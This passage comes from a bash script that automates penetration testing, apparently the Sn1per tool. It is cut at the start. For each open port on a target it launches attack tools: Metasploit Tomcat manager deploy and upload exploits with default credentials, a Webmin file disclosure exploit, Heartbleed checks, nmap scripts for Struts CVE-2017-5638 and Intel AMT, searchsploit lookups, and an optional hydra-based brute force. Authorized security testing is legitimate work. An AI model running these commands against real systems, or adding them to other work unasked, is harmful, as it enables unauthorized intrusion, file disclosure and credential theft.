msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_8443" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 8443 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 8443 opened... running tests...$RESET"
|
|
wafw00f http://$TARGET:8443
|
|
echo ""
|
|
whatweb http://$TARGET:8443
|
|
echo ""
|
|
xsstracer $TARGET 8443
|
|
sslscan --no-failed $TARGET:8443
|
|
sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET:8443
|
|
cd $PLUGINS_DIR/MassBleed
|
|
./massbleed $TARGET port 8443
|
|
cd $INSTALL_DIR
|
|
nikto -h https://$TARGET:8443
|
|
cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
|
|
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_8888" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 8888 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 8888 opened... running tests...$RESET"
|
|
wafw00f http://$TARGET:8888
|
|
echo ""
|
|
whatweb http://$TARGET:8888
|
|
echo ""
|
|
xsstracer $TARGET 8888
|
|
nikto -h http://$TARGET:8888
|
|
cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
|
|
nmap -sV -Pn --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8888 -T5 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_10000" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 10000 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 10000 opened... running tests...$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET"
|
|
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
|
|
msfconsole -x "use auxiliary/admin/webmin/file_disclosure; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
|
|
fi
|
|
|
|
if [ -z "$port_16992" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 16992 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 16992 opened... running tests...$RESET"
|
|
amap $TARGET 16992 -A
|
|
nmap -A -sV -Pn -T5 --script=/usr/share/nmap/scripts/http-vuln-INTEL-SA-00075.nse -p 16992 $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_27017" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
|
|
nmap -sV -p 27017 -Pn -T5 --script=mongodb* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_27018" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
|
|
nmap -sV -p 27018 -Pn -T5 --script=mongodb* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_27019" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
|
|
nmap -sV -p 27019 -Pn -T5 --script=mongodb* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_28017" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
|
|
nmap -sV -p 28017 -Pn -T5 --script=mongodb* $TARGET
|
|
fi
|
|
|
|
if [ -z "$port_49152" ];
|
|
then
|
|
echo -e "$OKRED + -- --=[Port 49152 closed... skipping.$RESET"
|
|
else
|
|
echo -e "$OKORANGE + -- --=[Port 49152 opened... running tests...$RESET"
|
|
$SUPER_MICRO_SCAN $TARGET
|
|
fi
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +$RESET"
|
|
cd $PLUGINS_DIR/yasuo
|
|
ruby yasuo.rb -r $TARGET -b all
|
|
cd $SNIPER_DIR
|
|
|
|
if [ "$FULLNMAPSCAN" = "0" ]; then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
|
|
else
|
|
echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
|
|
nmap -Pn -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
echo -e "$OKGREEN + -- ----------------------------=[Enumerating Exploits via Searchsploit]=--- -- +$RESET"
|
|
searchsploit --nmap $LOOT_DIR/nmap/nmap-$TARGET.xml
|
|
fi
|
|
|
|
if [ "$AUTOBRUTE" = "0" ]; then
|
|
echo -e "$OKGREEN + -- ----------------------------=[Skipping Brute Force]=-------------------- -- +$RESET"
|
|
else
|
|
echo -e "$OKGREEN + -- ----------------------------=[Running Brute Force]=--------------------- -- +$RESET"
|
|
brutex $TARGET
|
|
cd $INSTALL_DIR
|
|
rm -f hydra.restore
|
|
rm -f scan.log
|
|
echo ""
|
|
fi
|
|
|
|
rm -f $LOOT_DIR/.fuse_* 2> /dev/null
|
|
|
|
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
|
|
exit 0
|